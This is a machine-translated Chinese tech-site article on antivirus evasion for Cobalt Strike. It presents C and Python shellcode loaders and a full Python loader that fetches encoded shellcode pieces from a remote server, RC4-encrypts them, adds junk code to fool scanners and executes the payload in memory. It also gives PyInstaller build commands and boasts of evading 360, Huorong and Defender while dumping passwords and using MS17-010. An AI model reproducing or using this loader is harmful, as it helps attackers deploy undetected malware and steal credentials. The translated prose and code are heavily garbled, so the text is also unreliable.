Shulou(Shulou.com)05/31 Report--

This article will explain in detail about the use of python kill-free cs shellcode, the content of the article is of high quality, so the editor will share it for you as a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

1. What is shellcode

In a hacker attack, a shellcode is a small piece of code that exploits software vulnerabilities as a payload. It is called "shellcode" because it usually launches a command shell from which an attacker can control a compromised computer, but any code that performs similar tasks can be called shellcode. Because the function of payload is not limited to generating shell, some people think that the name of shellcode is not rigorous enough. However, efforts to replace the term have not been widely accepted. Shellcode is usually written in machine code.

Shellcode is a piece of machine code used to perform certain actions.

2. What is machine code

In Baidu encyclopedia, it is explained that the sentence of the program language directly used by the computer is the machine instruction code, which is a set of binary numbers used to direct the operations that the computer should do and the address of the operands.

The machine instruction code that directs the computer directly.

People use mnemonic symbols instead of machine instruction codes to form assembly language. later, in order to make it easier for computer users to program, various high-level computer languages have been developed. However, the code written by assembly language or other process-oriented or object-oriented high-level languages will eventually be converted into the corresponding machine script by the relevant translation and compilation environment before the computer can run the code, because the computer only knows the machine script.

3. What is shellcode loader

Human voice: shellcode loader is the code used to load and run shellcode.

Loading mode of CAccord plus loading

# include "pch.h" # include # include # pragma comment (linker, "/ subsystem:\" windows\ "/ entry:\" mainCRTStartup\ ") / / do not display window unsigned char shellcode [] ="\ xfc\ xe8\ x89\ x00\ x00\ x60\ x89\ xe5\. "; void main () {LPVOID Memory = VirtualAlloc (NULL, sizeof (shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (Memory = = NULL) {return } memcpy (Memory, shellcode, sizeof (shellcode)); ((void (*) () Memory) ();}

Python loading mode

#! / usr/bin/pythonimport ctypes shellcode = bytearray ("\ xfc\ xe8\ x89\ x00\ x60\ x89.") ptr = ctypes.windll.kernel32.VirtualAlloc (ctypes.c_int (0), ctypes.c_int (len (shellcode)), ctypes.c_int (0x3000), ctypes.c_int (0x40) buf = (ctypes.c_char * len (shellcode)). From_buffer (shellcode) ctypes.windll.kernel32.RtlMoveMemory (ctypes.c_int (ptr), buf) Ctypes.c_int (len (shellcode)) ht = ctypes.windll.kernel32.CreateThread (ctypes.c_int (0), ctypes.c_int (0), ctypes.c_int (ptr), ctypes.c_int (0), ctypes.c_int (0), ctypes.pointer (ctypes.c_int (0)) ctypes.windll.kernel32.WaitForSingleObject (ctypes.c_int (ht), ctypes.c_int (- 1))

Of course, there are many ways to write shellcode loader, assembly, go,csharp and many other languages, here are not one by one examples, let's move on to using Python language to write shellcode loader to achieve static and dynamic bypass the purpose of killing software.

Why use python

The entry threshold of python language is low, it is easy to get started, and this kind of kill-free method appeared two or three years ago, but many people say that the code made public on the Internet has been killed. Is this really the case? Have you ever calmed down to code, have you ever understood the relevant principles, whether you have diverged your thinking through the principles you have learned, and have you ever been to fuzz through code? If not, your Cobaltstrike and Metasploit are only fit to lie there and have sex. Blame me. Don't talk too much nonsense and get to the point.

Environmental preparation

1 、 python-2.7.17.amd64

Download address: https://www.python.org/ftp/python/2.7.17/python-2.7.17.amd64.msi

2. Pywin32-227.win-amd64-py2.7

Download address: https://github.com/mhammond/pywin32/releases

3 、 PyInstaller3.0

Download address: https://github.com/pyinstaller/pyinstaller/releases

4. Brief description:

This set of environmental matching is summed up by my constant experiments and personal preferences, and the installation method is not repeated. If you don't even have the ability to learn, you'd better let Cobaltstrike and Metasploit lie there and have sex. Personal advice: first: do not use pip to install PyInstaller, as to why, you can try a few more times to know how troublesome various compatible environments are. Second: if you also install the python3 environment, if you are afraid of trouble, you can install this environment separately in the virtual machine, because python3 and python2 co-exist, you still have to flip for a while, and the pits inside and pip2 pip3 have to be distinguished, and so on. Those who are willing to toss around recommend the following articles for reference

Https://blog.csdn.net/zydz/article/details/78121936

Https://blog.csdn.net/C_chuxin/article/details/82962797

Https://blog.csdn.net/qq_34444097/article/details/103027906

0x05 kill-free principle

1. Shellcode strings are not hard-coded (words: shellcode strings are not written in the code)

2. Confusion of multiple encoding methods for shellcode strings

3. Shellcode string encryption

4. Add a harmless code execution process to disrupt av analysis (early years of command-free thinking)

5,: CobaltStrike generated shellcode is a downloader, the main function is to download becon.dll, and then load into memory, many functions are in bencon, so cs shellcode actually does not have much dangerous action, but why it will be checked and killed by antivirus software, that is because antivirus software uses some algorithms such as fuzzy hash algorithm (Fuzzy Hashing) to extract the signature.

6:CobaltStrike itself uses a pipeline for process communication.

At present, there are three kinds of anti-virus security software, one based on feature, one based on behavior, and one based on cloud detection. The characteristics of cloud inspection and killing can also be summarized as characteristic investigation and killing.

According to the conclusion of my fuzz: is dynamic behavior detection and killing really difficult? The answer is no: CobaltStrike's pipeline communication mode plus the use of command-free thinking at the high-level language level is as effective as adding some normal code at the shellcode loader code level to make exe itself have normal action and disturb av's judgment, of course, the premise is that we stand on the advantage of CobaltStrike's pipeline communication mode. Is it better to check and kill statically? The answer is: better than: shellcode does not land + CobaltStrike's own pipeline communication mode + shellcode string various combinations of encoding + encryption. The characteristic of cloud inspection and killing is about equal to the characteristic investigation and killing, which is better than.

Summary: the rough and simple methods described in this article are all realized on the powerful shoulders of CobaltStrike.

0x06 show you the code

From ctypesimport * import ctypesimport sys, os, hashlib, time, base64import random, stringimport requestsimport time# get random string function Reduced feature def GenPassword (length): numOfNum = random.randint (1) numOfLetter = length- numOfNum slcNum = [random.choice (string.digits) for i in range (numOfNum)] slcLetter = [random.choice (string.ascii_letters) for i in range (numOfLetter)] slcChar = slcNum + slcLetter random.shuffle (slcChar) getPwd = '.join ([i for i in slcChar]) return getPwd# rc4 encryption and decryption function, public_key (public key) uses GenPassword function Reduce feature def rc4 (string, op='encode', public_key=GenPassword (7)) Expirytime=0): ckey_lenth = 4public_key = public_key and public_key or''key = hashlib.md5 (public_key). Hexdigest () keya = hashlib.md5 (key [0:16]). Hexdigest () keyb = hashlib.md5 (key [16:32]). Hexdigest () keyc = ckey_lenth and (op =' decode' and stringing [0: ckey_lenth] or hashlib.md5 (str (time.time ()). Hexdigest () [32-ckey_lenth:32]) or' 'cryptkey = keya + hashlib.md5 (keya + keyc). Hexdigest () key_lenth = len (cryptkey) # 64string = op = =' decode' and base64.b64decode (string [4:]) or '0000000000' + hashlib.md5 (string + keyb). Hexdigest () [0:16] + string string_lenth = len (string) result =' box = list (range) randkey = [] for i in xrange (2): randkey.append (ord (range [I% key_lenth])) for I In xrange: J = 0j = (j + box [I] + randkey [I])% 256tmp = box [I] box [j] box [j] = tmpfor i in xrange (string_lenth): a = j = 0a = (a + 1)% 256j = (j + box [a])% 256tmp = box [j] box [j] = tmp result + = chr (ord [I]) ^ (box [(box [a]) ] + box [j])% 256]) if op = 'decode':if (result [0:10] = =' 0000000000' or int (result [0:10])-int (time.time ()) > 0) and result [10:26] = = hashlib.md5 (result [26:] + keyb). Hexdigest () [0:16]: return result [26:] else:return Noneelse:return keyc + base64.b64encode (result) # the following is the shellcode loader code # shellcode string After base64 coding and hex coding, it is divided into three blocks. The encoded shellcode string res1 = requests.get ("http://xxx.xxx.xxx/code/Shellcode1.TXT")res2 = requests.get (" http://xxx.xxx.xxx/code/Shellcode2.TXT")res3 = requests.get ("http://xxx.xxx.xxx/code/Shellcode3.TXT")VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc VirtualProtect = ctypes.windll.kernel32.VirtualProtect whnd = ctypes) is obtained by # get request on some servers). .windll.kernel32.GetConsoleWindow () rcpw = GenPassword (13) # get the encoded shellcode string and encrypt it with rc4 The private key is obtained through the GenPassword () function # to reduce * * Shellcode raw string buf = rc4 (base64.b64decode (res1.text+res2.text+res3.text) .decode ('hex'),' encode',rcpw) rc4 (res2.text,'encode',GenPassword (13)) # interference code if whnd! = 0:if GenPassword (6)! = GenPassword (7): # interference code ctypes.windll.use***.ShowWindow (whnd, 0) ctypes.windll.kernel32.CloseHandle (whnd) # decryption shellcodescode = bytearray (rc4 (buf, 'decode') Rcpw)) rc4 (res2.text+res1.text,'encode',GenPassword (13)) # interference Code # request readable, writable and non-executable memory memHscode = ctypes.windll.kernel32.VirtualAlloc (ctypes.c_int (0), ctypes.c_int (len (scode)), ctypes.c_int (0x3000), ctypes.c_int (0x40)) rc4 (res1.text,'encode' GenPassword (13)) # interference code buf = (ctypes.c_char * len (scode)) .from_buffer (scode) old = ctypes.c_long (1) # use VirtualProtect to set the memory block of the shellcode to executable The so-called progressive loading mode VirtualProtect (memHscode, ctypes.c_int (len (scode)), 0x40, ctypes.byref (old)) ctypes.windll.kernel32.RtlMoveMemory (ctypes.c_int (memHscode), buf, ctypes.c_int (len (scode) fuck=rc4 (GenPassword (7), 'encode',GenPassword (13)) # interference code runcode = cast (memHscode, CFUNCTYPE (c_void_p)) # create shellcode's function pointer fuck=rc4 (GenPassword (7),' encode' GenPassword (13)) # interference code runcode () # execution

0x07 compiles with PyInstaller

1. Do not specify the compilation method of the icon

Python2 PyInstaller.py-noconsole-onefile cs\ cs.py

2. Specify the compilation mode of the icon

Python2 PyInstaller.py-noconsole-icon cs\ icon.ico-onefile cs\ cs.py

0x08 result test

1. Test environment

[win10 Professional Edition + windows defender] [win7 Enterprise Edition + 360Family Bucket + velvet] [Micro-step Cloud Sandbox] [virustotal.com]

2. Static inspection and killing

3. Micro-step cloud sandbox

4 、 virustotal

Https://www.virustotal.com/gui/file/b19bdc96af2b885b3f77915761269a640c500b553dd1dd795145d090b9b64042/detection

Although the detection rate of virustotal.com is not very optimistic, but for domestic, it can also meet the daily needs.

5. Dynamic behavior detection

Test in the case of win7 Enterprise Edition with all the family buckets and velvet updated to the latest

Cobalt Strike was successfully launched, and 360 + Trench did not intercept or prompt.

Of course, this is all useless, and then we'll see what happens when you use cs's features.

1 、 logonpasswords

Everything is normal, and there is no interception and hint to kill soft.

2. View the list of processes

3. Screenshot

Of course, it's all useless. Next, let's have some excitement.

4 、 ms17010

Ms17010 also played smoothly. And 360 family bucket + velvet does not have any intercept + hint.

5. Linkage Metasploit

Win10 Professional Edition + windows denfender

Only when we get here can we say, well, it's still rich.

Attach an ip that once forgot to replace vps during the test.

Since we have uploaded the micro-step cloud sand box and virustotal.com, the samples will be analyzed by the major software-killing manufacturers to extract the signature and study the defensive posture, so it is recommended that you build a virtual machine to test when testing, otherwise your vps will have to be changed (the ip address will be marked), and the posture of your fuzz will soon be extracted into the signature. Then why am I willing to show you the code? Because even if the public code is extracted from the signature, you will not kill it if you change it. It's as simple as that.

About the use of python kill-free cs shellcode to share here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.